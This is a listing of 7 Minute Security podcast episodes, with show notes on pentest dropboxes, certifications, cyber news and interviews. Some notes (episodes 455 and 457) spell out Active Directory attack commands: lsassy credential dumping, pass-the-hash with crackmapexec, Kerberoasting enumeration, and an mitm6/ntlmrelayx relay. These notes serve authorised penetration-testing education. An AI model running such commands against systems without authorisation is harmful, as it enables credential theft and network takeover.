Synopsis
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
Episodes
-
7MS #468: Eating the Security Dog Food - Part 3
20/05/2021 Duration: 24min
Today we continue the series on eating your own security dog food! Specifically, we talk about: Keeping a log and procedure for sanitizing systems Keeping a log and procedure for provisioning systems A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire: wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false If you want more tips on building pentest dropboxes, check out this series Oh, and today's song that I sang obnoxiously is If I Were a Dog.
-
7MS #467: How to Succeed in Business Without Really Crying - Part 9
12/05/2021 Duration: 55min
Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets! Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include: Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something! Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelin
-
7MS #466: Attacking and Defending Azure AD Cloud (CARTP)
05/05/2021 Duration: 01h44s
Welp, I need another security certification like I needed a punch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me. In this episode I talk about some of the TTPs covered in week 1 of this course, as well as: Likes: Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week) Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from. Dislikes: On Saturdays I'm a sleepy Brian. :-) I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch. Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with al
-
7MS #465: Cyber News - The FBI Might Be Getting Into the IR Biz Edition
28/04/2021 Duration: 53min
Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including: FBI removes hacker back doors NSA: 5 security bugs under active nation-state cyberattack Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it. On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Codecov users warned after backdoor discovered in devops tool
-
7MS #464: Interview with Christopher Fielder of Arctic Wolf
22/04/2021 Duration: 50min
Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444) - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about: When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals. Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!" Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-
-
7MS #463: DIY Pentest Dropbox Tips - Part 5
14/04/2021 Duration: 37min
In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process! In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that: Sets the timezone with tzutil /s "Central Standard Time" Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0 Grabs and runs a PS file that does a ton of downloading and unzipping of files with: invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\" Installs Windows updates with: Install-
-
7MS #462: Pentesting with the Hak5 Key Croc
07/04/2021 Duration: 37min
Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this: "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great." "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that." 5 seconds go by... "Well it's just $100, shut up and take my money!" "It came in the mail today! It has a cool envelope and everything!" "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem." 5 days go by... "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use.
-
7MS #461: Tales of Internal Network Pentest Pwnage - Part 26
31/03/2021 Duration: 47min
OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast. I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.
-
7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
24/03/2021 Duration: 40min
Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value. Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin. Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week! If you want to hang in for this clown show, you'll be treated to some of the following highlights: How I did not pirate Boson NetSim How I fell in love with the Edge Router X as an up-and-coming network guru The schedule isn't up, but I'm speaking at Secure360 this year! My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?
-
7MS #459: Cyber News - Microsoft Exchange Makes the World Cry Edition
17/03/2021 Duration: 01h03min
Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include: Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch! Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are: Out of date and/or unsupported OS = bad Weak credentials = ba
-
7MS #458: Interview with Tanya Janca
11/03/2021 Duration: 59min
Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple! Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own. Gh0sthax and I sat down with Tanya over Zoom to discuss: How to overcome your fears and present at conferences, write blog posts and even start your own company! How to deal with online jackwagons who troll you online at conferences The importance of finding a mentor and mentoring others Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview: Bob and Alice Learn Application Security - Tanya's book, available on Amazon Women of Security (WoSEC) We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone cre
-
7MS #457: Tales of Internal Network Pentest Pwnage - Part 25
04/03/2021 Duration: 31min
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access! Once you know where you have local admin access, lsassy is your friend: lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server Did you get an admin's NTLM hash from this dump? Then do this: crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED' (Pwn3d!) FTW!
-
7MS #456: Certified Red Team Professional - Part 4
25/02/2021 Duration: 56min
Hello friends! Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft. Specifically, Joe and I talk about: We don't think the training/exam is for beginners, despite how it's advertised Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!) Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS! Although not required, we highly recommend capturing all the flags laid out for you in the lab environment Know how to privesc - using multiple tools/methods It would be to your advantage to understand how to view/manipulate Active Directory information in multip
-
7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
19/02/2021 Duration: 52min
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: I got to use some of my new CRTP skills! Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired Check for misconfigured LAPS installs with Get-LAPSPasswords! The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workst
-
7MS #454: Cyber News - Lets Switch to Typewriters Edition
11/02/2021 Duration: 50min
Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including: Sudo bug gives root access to mass numbers of Linux systems! What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation
-
7MS #453: Interview with Marcello Salvati
04/02/2021 Duration: 01h05min
Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss: Brian's Chris Farley moment with Marcello Marcello's infosec origin story CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord. What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding? What the heck is Nim and why is Marcello so excited about OffensiveNim?
-
7MS #452: Enterprise Attacker Emulation and C2 Implant Development
28/01/2021 Duration: 39min
Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on: The Fargo TV series Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS This Key and Peele sketch I just took my CRTP exam, which we've talked about a lot in the past 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r
-
7MS #451: Deep Freeze
22/01/2021 Duration: 48min
Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore! Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)
-
7MS #450: DIY Pentest Dropbox Tips - part 4
15/01/2021 Duration: 56min
Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands: tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster! Don't like it that Server Manager loves to r
-
7MS #449: DIY Pentest Dropbox Tips - Part 3
07/01/2021 Duration: 01h06min
Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen: Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds. Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like